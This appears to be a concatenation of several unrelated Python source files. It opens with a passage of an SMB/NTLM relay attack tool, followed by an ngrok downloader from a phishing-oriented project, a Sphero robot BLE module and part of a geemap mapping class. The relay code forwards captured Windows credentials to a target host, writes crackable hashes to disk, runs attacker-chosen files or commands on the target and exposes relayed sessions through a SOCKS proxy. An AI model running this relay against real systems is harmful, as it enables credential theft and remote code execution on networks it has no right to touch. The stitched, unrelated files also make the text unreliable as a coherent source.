logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies the status to return to the connecting client after a successful
# relayed authentication. This is useful when we don't want the connecting
# client to cache the successful credentials in memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make it store them accordingly.
# STATUS_ACCESS_DENIED - may occur, for instance, when the client is not a Domain Admin
# and Remote UAC is configured, thus preventing connection to ADMIN$.
# STATUS_LOGON_FAILURE - tells the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
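# Illustrative call (hypothetical): make relayed clients believe their logon failed,
# so they are less likely to keep the credentials around:
#   relay_server.setReturnStatus('logon_failure')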
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbrelayx.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
ngrok.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/jofpin/trape
#
# Copyright 2018 by Jose Pino (@jofpin) / <jofpin@gmail.com>
#**
import sys
import os, platform
import subprocess
import socket
import os.path as path
from multiprocessing import Process
class ngrok(object):
def __init__(self, authtoken, port, nT, hash):
if authtoken:
self.token = authtoken
else:
print "Can't use Ngrok without a valid token"
system_type = os.name
system_name = platform.system()
system_architecture = platform.architecture()[0]
str_ngrok = './ngrok'
if "nt" in system_type:
str_ngrok = './ngrok.exe'
if path.exists(str_ngrok):
pass
else:
import urllib2
if "posix" in system_type:
if "arwin" in system_name:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-386.zip"
else:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip"
elif "nt" in system_type:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-386.zip"
else:
sys.exit(0)
filename = "ngrok.zip"
download = urllib2.urlopen(download_link)
saved_file=file(filename,"w")
saved_file.write(download.read())
saved_file.close()
result = subprocess.check_output(["unzip", filename])
os.remove(filename)
subprocess.check_output([str_ngrok, "authtoken", authtoken])
if nT > 0:
pNg = Process(target=start_ngrok, args=(str(port), hash, 1))
pNg.start()
def start_ngrok(port, hash, f=0):
if f != 0:
str_ngrok = './ngrok'
system_type = os.name
if "nt" in system_type:
str_ngrok = './ngrok.exe'
result = subprocess.check_output([str_ngrok, "http", port])
print result
|
__init__.py
|
import threading
import time
from collections import OrderedDict, defaultdict
from concurrent import futures
from functools import partial
from queue import SimpleQueue
from typing import NamedTuple, Callable
from spherov2.controls.v1 import Packet as PacketV1
from spherov2.controls.v2 import Packet as PacketV2
from spherov2.types import ToyType
class ToySensor(NamedTuple):
bit: int
min_value: float
max_value: float
modifier: Callable[[float], float] = None
class Toy:
toy_type = ToyType('Robot', None, 'Sphero', .06)
sensors = OrderedDict()
extended_sensors = OrderedDict()
_send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
_response_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
_handshake = [('22bb746f-2bbd-7554-2d6f-726568705327', bytearray(b'011i3')),
('22bb746f-2bb2-7554-2d6f-726568705327', bytearray([7]))]
_packet = PacketV1
_require_target = False
def __init__(self, toy, adapter_cls):
self.address = toy.address
self.name = toy.name
self.__adapter = None
self.__adapter_cls = adapter_cls
self._packet_manager = self._packet.Manager()
self.__decoder = self._packet.Collector(self.__new_packet)
self.__waiting = defaultdict(SimpleQueue)
self.__listeners = defaultdict(dict)
self._sensor_controller = None
self.__thread = None
self.__packet_queue = SimpleQueue()
def __enter__(self):
if self.__adapter is not None:
raise RuntimeError('Toy already in context manager')
self.__adapter = self.__adapter_cls(self.address)
self.__thread = threading.Thread(target=self.__process_packet)
try:
for uuid, data in self._handshake:
self.__adapter.write(uuid, data)
self.__adapter.set_callback(self._response_uuid, self.__api_read)
self.__thread.start()
except:
self.__exit__(None, None, None)
raise
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.__adapter.close()
self.__adapter = None
if self.__thread.is_alive():
self.__packet_queue.put(None)
self.__thread.join()
self.__packet_queue = SimpleQueue()
def __process_packet(self):
while self.__adapter is not None:
payload = self.__packet_queue.get()
if payload is None:
break
# print('request ' + ' '.join([hex(c) for c in payload]))
while payload:
self.__adapter.write(self._send_uuid, payload[:20])
payload = payload[20:]
time.sleep(self.toy_type.cmd_safe_interval)
def _execute(self, packet):
if self.__adapter is None:
raise RuntimeError('Use toys in context manager')
self.__packet_queue.put(packet.build())
return self._wait_packet(packet.id)
def _wait_packet(self, key, timeout=10.0, check_error=False):
future = futures.Future()
self.__waiting[key].put(future)
packet = future.result(timeout)
if check_error:
packet.check_error()
return packet
def _add_listener(self, key, listener: Callable):
self.__listeners[key[0]][listener] = partial(key[1], listener)
def _remove_listener(self, key, listener: Callable):
self.__listeners[key[0]].pop(listener)
def __api_read(self, char, data):
self.__decoder.add(data)
def __new_packet(self, packet):
# print('response ' + ' '.join([hex(c) for c in packet.build()]))
key = packet.id
queue = self.__waiting[key]
while not queue.empty():
queue.get().set_result(packet)
for f in self.__listeners[key].values():
threading.Thread(target=f, args=(packet,)).start()
@classmethod
def implements(cls, method, with_target=False):
m = getattr(cls, method.__name__, None)
if m is method:
return with_target == cls._require_target
if hasattr(m, '_partialmethod'):
f = m._partialmethod
return f.func is method and (
('proc' in f.keywords and not with_target) or with_target == cls._require_target)
return False
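# Usage sketch (discovered_toy, BleakAdapter and some_packet are illustrative
# placeholders, not names defined in this module): a Toy is meant to be driven
# inside a context manager so the BLE handshake, the response callback and the
# writer thread are all set up before any packet is executed.
#   toy = Toy(discovered_toy, BleakAdapter)
#   with toy:
#       response = toy._execute(some_packet)   # queues the packet and waits for the response matching its id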
class ToyV2(Toy):
_packet = PacketV2
_handshake = []
_response_uuid = _send_uuid = '00010002-574f-4f20-5370-6865726f2121' #Original
#_response_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
#_send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
#_send_uuid = '00010002-574f-4f20-5370-6865726f2121'
#_response_uuid = '00020002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00010001-574f-4f20-5370-6865726f2121' #Available responses
# _response_uuid = _send_uuid = '00010002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00010003-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020001-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020004-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020005-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '22bb746f-2bbd-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bb2-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bbf-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba0-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bb0-7554-2d6f-726568705327'
#Some values found in apk - should revisit what values may be per robot
#Adaptor.BLEService = "22bb746f2bb075542d6f726568705327";
#Adaptor.WakeCharacteristic = "22bb746f2bbf75542d6f726568705327";
#Adaptor.TXPowerCharacteristic = "22bb746f2bb275542d6f726568705327";
#Adaptor.AntiDosCharacteristic = "22bb746f2bbd75542d6f726568705327";
#Adaptor.RobotControlService = "22bb746f2ba075542d6f726568705327";
#Adaptor.CommandsCharacteristic = "22bb746f2ba175542d6f726568705327";
#Adaptor.ResponseCharacteristic = "22bb746f2ba675542d6f726568705327";
|
geemap.py
|
"""Main module for interactive mapping using Google Earth Engine Python API and ipyleaflet.
Keep in mind that Earth Engine-style functions use camel case, such as setOptions(), setCenter(), centerObject(), and addLayer(), while
ipyleaflet-style functions use snake case, such as add_tile_layer(), add_wms_layer(), and add_minimap().
"""
import math
import os
import time
import ee
import ipyevents
import ipyleaflet
import ipywidgets as widgets
from bqplot import pyplot as plt
from ipyfilechooser import FileChooser
from IPython.display import display
from .basemaps import basemap_tiles, basemaps
from .common import *
from .conversion import *
from .legends import builtin_legends
class Map(ipyleaflet.Map):
"""The Map class inherits from ipyleaflet.Map. The arguments you can pass to the Map can be found at https://ipyleaflet.readthedocs.io/en/latest/api_reference/map.html. By default, the Map will add Google Maps as the basemap. Set add_google_map = False to use OpenStreetMap as the basemap.
Returns:
object: ipyleaflet map object.
"""
def __init__(self, **kwargs):
# Authenticates Earth Engine and initializes an Earth Engine session
if "ee_initialize" not in kwargs.keys():
kwargs["ee_initialize"] = True
if kwargs["ee_initialize"]:
ee_initialize()
# Default map center location (lat, lon) and zoom level
latlon = [40, -100]
zoom = 4
# Interchangeable parameters between ipyleaflet and folium
if "height" not in kwargs.keys():
kwargs["height"] = "600px"
if "location" in kwargs.keys():
kwargs["center"] = kwargs["location"]
kwargs.pop("location")
if "center" not in kwargs.keys():
kwargs["center"] = latlon
if "zoom_start" in kwargs.keys():
kwargs["zoom"] = kwargs["zoom_start"]
kwargs.pop("zoom_start")
if "zoom" not in kwargs.keys():
kwargs["zoom"] = zoom
if "add_google_map" not in kwargs.keys() and "basemap" not in kwargs.keys():
kwargs["add_google_map"] = True
if "scroll_wheel_zoom" not in kwargs.keys():
kwargs["scroll_wheel_zoom"] = True
if "lite_mode" not in kwargs.keys():
kwargs["lite_mode"] = False
if kwargs["lite_mode"]:
kwargs["data_ctrl"] = False
kwargs["zoom_ctrl"] = True
kwargs["fullscreen_ctrl"] = False
kwargs["draw_ctrl"] = False
kwargs["search_ctrl"] = False
kwargs["measure_ctrl"] = False
kwargs["scale_ctrl"] = False
kwargs["layer_ctrl"] = False
kwargs["toolbar_ctrl"] = False
kwargs["attribution_ctrl"] = False
if "data_ctrl" not in kwargs.keys():
kwargs["data_ctrl"] = True
if "zoom_ctrl" not in kwargs.keys():
kwargs["zoom_ctrl"] = True
if "fullscreen_ctrl" not in kwargs.keys():
kwargs["fullscreen_ctrl"] = True
if "draw_ctrl" not in kwargs.keys():
kwargs["draw_ctrl"] = True
if "search_ctrl" not in kwargs.keys():
kwargs["search_ctrl"] = False
if "measure_ctrl" not in kwargs.keys():
kwargs["measure_ctrl"] = True
if "scale_ctrl" not in kwargs.keys():
kwargs["scale_ctrl"] = True
if "layer_ctrl" not in kwargs.keys():
kwargs["layer_ctrl"] = False
if "toolbar_ctrl" not in kwargs.keys():
kwargs["toolbar_ctrl"] = True
if "attribution_ctrl" not in kwargs.keys():
kwargs["attribution_ctrl"] = True
if "use_voila" not in kwargs.keys():
kwargs["use_voila"] = False
if (
"basemap" in kwargs.keys()
and isinstance(kwargs["basemap"], str)
and kwargs["basemap"] in basemaps.keys()
):
kwargs["basemap"] = basemap_tiles[kwargs["basemap"]]
if os.environ.get("USE_VOILA") is not None:
kwargs["use_voila"] = True
# Inherits the ipyleaflet Map class
super().__init__(**kwargs)
self.baseclass = "ipyleaflet"
self.layout.height = kwargs["height"]
self.clear_controls()
# The number of shapes drawn by the user using the DrawControl
self.draw_count = 0
# The list of Earth Engine Geometry objects converted from geojson
self.draw_features = []
# The Earth Engine Geometry object converted from the last drawn feature
self.draw_last_feature = None
self.draw_layer = None
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = None
self.user_rois = None
self.last_ee_data = None
self.last_ee_layer = None
self.roi_start = False
self.roi_end = False
if kwargs["ee_initialize"]:
self.roi_reducer = ee.Reducer.mean()
self.roi_reducer_scale = None
# List for storing pixel values and locations based on user-drawn geometries.
self.chart_points = []
self.chart_values = []
self.chart_labels = None
self.plot_widget = None # The plot widget for plotting Earth Engine data
self.plot_control = None # The plot control for interacting plotting
self.random_marker = None
self.legend_widget = None
self.legend_control = None
self.colorbar = None
self.ee_layers = []
self.ee_layer_names = []
self.ee_raster_layers = []
self.ee_raster_layer_names = []
self.ee_vector_layers = []
self.ee_vector_layer_names = []
self.ee_layer_dict = {}
self.search_locations = None
self.search_loc_marker = None
self.search_loc_geom = None
self.search_datasets = None
self.screenshot = None
self.toolbar = None
self.toolbar_button = None
self.vis_control = None
self.vis_widget = None
self.colorbar_ctrl = None
self.colorbar_widget = None
self.tool_output = None
self.tool_output_ctrl = None
self.layer_control = None
self.convert_ctrl = None
# Adds search button and search box
search_button = widgets.ToggleButton(
value=False,
tooltip="Search location/data",
icon="globe",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
search_type = widgets.ToggleButtons(
options=["name/address", "lat-lon", "data"],
tooltips=[
"Search by place name or address",
"Search by lat-lon coordinates",
"Search Earth Engine data catalog",
],
)
search_type.style.button_width = "110px"
search_box = widgets.Text(
placeholder="Search by place name or address",
tooltip="Search location",
layout=widgets.Layout(width="340px"),
)
search_output = widgets.Output(
layout={
"max_width": "340px",
"max_height": "250px",
"overflow": "scroll",
}
)
search_results = widgets.RadioButtons()
assets_dropdown = widgets.Dropdown(
options=[],
layout=widgets.Layout(min_width="279px", max_width="279px"),
)
import_btn = widgets.Button(
description="import",
button_style="primary",
tooltip="Click to import the selected asset",
layout=widgets.Layout(min_width="57px", max_width="57px"),
)
def import_btn_clicked(b):
if assets_dropdown.value is not None:
datasets = self.search_datasets
dataset = datasets[assets_dropdown.index]
dataset_uid = "dataset_" + random_string(string_length=3)
line1 = "{} = {}\n".format(dataset_uid, dataset["ee_id_snippet"])
line2 = "Map.addLayer(" + dataset_uid + ', {}, "' + dataset["id"] + '")'
contents = "".join([line1, line2])
create_code_cell(contents)
import_btn.on_click(import_btn_clicked)
html_widget = widgets.HTML()
def dropdown_change(change):
dropdown_index = assets_dropdown.index
if dropdown_index is not None and dropdown_index >= 0:
with search_output:
search_output.clear_output(wait=True)
print("Loading ...")
datasets = self.search_datasets
dataset = datasets[dropdown_index]
dataset_html = ee_data_html(dataset)
html_widget.value = dataset_html
search_output.clear_output(wait=True)
display(html_widget)
assets_dropdown.observe(dropdown_change, names="value")
assets_combo = widgets.HBox()
assets_combo.children = [import_btn, assets_dropdown]
def search_result_change(change):
result_index = search_results.index
locations = self.search_locations
location = locations[result_index]
latlon = (location.lat, location.lng)
self.search_loc_geom = ee.Geometry.Point(location.lng, location.lat)
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
search_results.observe(search_result_change, names="value")
def search_btn_click(change):
if change["new"]:
search_widget.children = [search_button, search_result_widget]
search_type.value = "name/address"
else:
search_widget.children = [search_button]
search_result_widget.children = [search_type, search_box]
search_button.observe(search_btn_click, "value")
def search_type_changed(change):
search_box.value = ""
search_output.clear_output()
if change["new"] == "name/address":
search_box.placeholder = "Search by place name or address, e.g., Paris"
assets_dropdown.options = []
search_result_widget.children = [
search_type,
search_box,
search_output,
]
elif change["new"] == "lat-lon":
search_box.placeholder = "Search by lat-lon, e.g., 40, -100"
assets_dropdown.options = []
search_result_widget.children = [
search_type,
search_box,
search_output,
]
elif change["new"] == "data":
search_box.placeholder = (
"Search GEE data catalog by keywords, e.g., elevation"
)
search_result_widget.children = [
search_type,
search_box,
assets_combo,
search_output,
]
search_type.observe(search_type_changed, names="value")
def search_box_callback(text):
if text.value != "":
if search_type.value == "name/address":
g = geocode(text.value)
elif search_type.value == "lat-lon":
g = geocode(text.value, reverse=True)
if g is None and latlon_from_text(text.value):
search_output.clear_output()
latlon = latlon_from_text(text.value)
self.search_loc_geom = ee.Geometry.Point(latlon[1], latlon[0])
if self.search_loc_marker is None:
marker = ipyleaflet.Marker(
location=latlon,
draggable=False,
name="Search location",
)
self.search_loc_marker = marker
self.add_layer(marker)
self.center = latlon
else:
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
with search_output:
print(f"No address found for {latlon}")
return
elif search_type.value == "data":
search_output.clear_output()
with search_output:
print("Searching ...")
self.default_style = {"cursor": "wait"}
ee_assets = search_ee_data(text.value)
self.search_datasets = ee_assets
asset_titles = [x["title"] for x in ee_assets]
assets_dropdown.options = asset_titles
search_output.clear_output()
if len(ee_assets) > 0:
html_widget.value = ee_data_html(ee_assets[0])
with search_output:
display(html_widget)
self.default_style = {"cursor": "default"}
return
self.search_locations = g
if g is not None and len(g) > 0:
top_loc = g[0]
latlon = (top_loc.lat, top_loc.lng)
self.search_loc_geom = ee.Geometry.Point(top_loc.lng, top_loc.lat)
if self.search_loc_marker is None:
marker = ipyleaflet.Marker(
location=latlon,
draggable=False,
name="Search location",
)
self.search_loc_marker = marker
self.add_layer(marker)
self.center = latlon
else:
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
search_results.options = [x.address for x in g]
search_result_widget.children = [
search_type,
search_box,
search_output,
]
with search_output:
search_output.clear_output(wait=True)
display(search_results)
else:
with search_output:
search_output.clear_output()
print("No results could be found.")
search_box.on_submit(search_box_callback)
search_result_widget = widgets.VBox([search_type, search_box])
search_widget = widgets.HBox([search_button])
search_event = ipyevents.Event(
source=search_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_search_event(event):
if event["type"] == "mouseenter":
search_widget.children = [search_button, search_result_widget]
# search_type.value = "name/address"
elif event["type"] == "mouseleave":
if not search_button.value:
search_widget.children = [search_button]
search_result_widget.children = [search_type, search_box]
search_event.on_dom_event(handle_search_event)
data_control = ipyleaflet.WidgetControl(
widget=search_widget, position="topleft"
)
if kwargs.get("data_ctrl"):
self.add_control(control=data_control)
search_marker = ipyleaflet.Marker(
icon=ipyleaflet.AwesomeIcon(
name="check", marker_color="green", icon_color="darkgreen"
)
)
search = ipyleaflet.SearchControl(
position="topleft",
url="https://nominatim.openstreetmap.org/search?format=json&q={s}",
zoom=5,
property_name="display_name",
marker=search_marker,
)
if kwargs.get("search_ctrl"):
self.add_control(search)
if kwargs.get("zoom_ctrl"):
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
if kwargs.get("layer_ctrl"):
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
self.add_control(layer_control)
if kwargs.get("scale_ctrl"):
scale = ipyleaflet.ScaleControl(position="bottomleft")
self.scale_control = scale
self.add_control(scale)
if kwargs.get("fullscreen_ctrl"):
fullscreen = ipyleaflet.FullScreenControl()
self.fullscreen_control = fullscreen
self.add_control(fullscreen)
if kwargs.get("measure_ctrl"):
measure = ipyleaflet.MeasureControl(
position="bottomleft",
active_color="orange",
primary_length_unit="kilometers",
)
self.measure_control = measure
self.add_control(measure)
if kwargs.get("add_google_map"):
self.add_layer(basemap_tiles["ROADMAP"])
if kwargs.get("attribution_ctrl"):
self.add_control(ipyleaflet.AttributionControl(position="bottomright"))
draw_control = ipyleaflet.DrawControl(
marker={"shapeOptions": {"color": "#3388ff"}},
rectangle={"shapeOptions": {"color": "#3388ff"}},
circle={"shapeOptions": {"color": "#3388ff"}},
circlemarker={},
edit=True,
remove=True,
)
draw_control_lite = ipyleaflet.DrawControl(
marker={},
rectangle={"shapeOptions": {"color": "#3388ff"}},
circle={"shapeOptions": {"color": "#3388ff"}},
circlemarker={},
polyline={},
polygon={},
edit=False,
remove=False,
)
# Handles draw events
def handle_draw(target, action, geo_json):
try:
self.roi_start = True
geom = geojson_to_ee(geo_json, False)
self.user_roi = geom
feature = ee.Feature(geom)
self.draw_last_json = geo_json
self.draw_last_feature = feature
if action == "deleted" and len(self.draw_features) > 0:
self.draw_features.remove(feature)
self.draw_count -= 1
else:
self.draw_features.append(feature)
self.draw_count += 1
collection = ee.FeatureCollection(self.draw_features)
self.user_rois = collection
ee_draw_layer = ee_tile_layer(
collection, {"color": "blue"}, "Drawn Features", False, 0.5
)
draw_layer_index = self.find_layer_index("Drawn Features")
if draw_layer_index == -1:
self.add_layer(ee_draw_layer)
self.draw_layer = ee_draw_layer
else:
self.substitute_layer(self.draw_layer, ee_draw_layer)
self.draw_layer = ee_draw_layer
self.roi_end = True
self.roi_start = False
except Exception as e:
self.draw_count = 0
self.draw_features = []
self.draw_last_feature = None
self.draw_layer = None
self.user_roi = None
self.roi_start = False
self.roi_end = False
print("There was an error creating Earth Engine Feature.")
raise Exception(e)
draw_control.on_draw(handle_draw)
if kwargs.get("draw_ctrl"):
self.add_control(draw_control)
self.draw_control = draw_control
self.draw_control_lite = draw_control_lite
# Dropdown widget for plotting
self.plot_dropdown_control = None
self.plot_dropdown_widget = None
self.plot_options = {}
self.plot_marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.plot_coordinates = []
self.plot_markers = []
self.plot_last_click = []
self.plot_all_clicks = []
self.plot_checked = False
self.inspector_checked = False
inspector_output = widgets.Output(layout={"border": "1px solid black"})
inspector_output_control = ipyleaflet.WidgetControl(
widget=inspector_output, position="topright"
)
tool_output = widgets.Output()
self.tool_output = tool_output
tool_output.clear_output(wait=True)
save_map_widget = widgets.VBox()
save_type = widgets.ToggleButtons(
options=["HTML", "PNG", "JPG"],
tooltips=[
"Save the map as an HTML file",
"Take a screenshot and save as a PNG file",
"Take a screenshot and save as a JPG file",
],
)
file_chooser = FileChooser(os.getcwd())
file_chooser.default_filename = "my_map.html"
file_chooser.use_dir_icons = True
ok_cancel = widgets.ToggleButtons(
value=None,
options=["OK", "Cancel"],
tooltips=["OK", "Cancel"],
button_style="primary",
)
def save_type_changed(change):
ok_cancel.value = None
# file_chooser.reset()
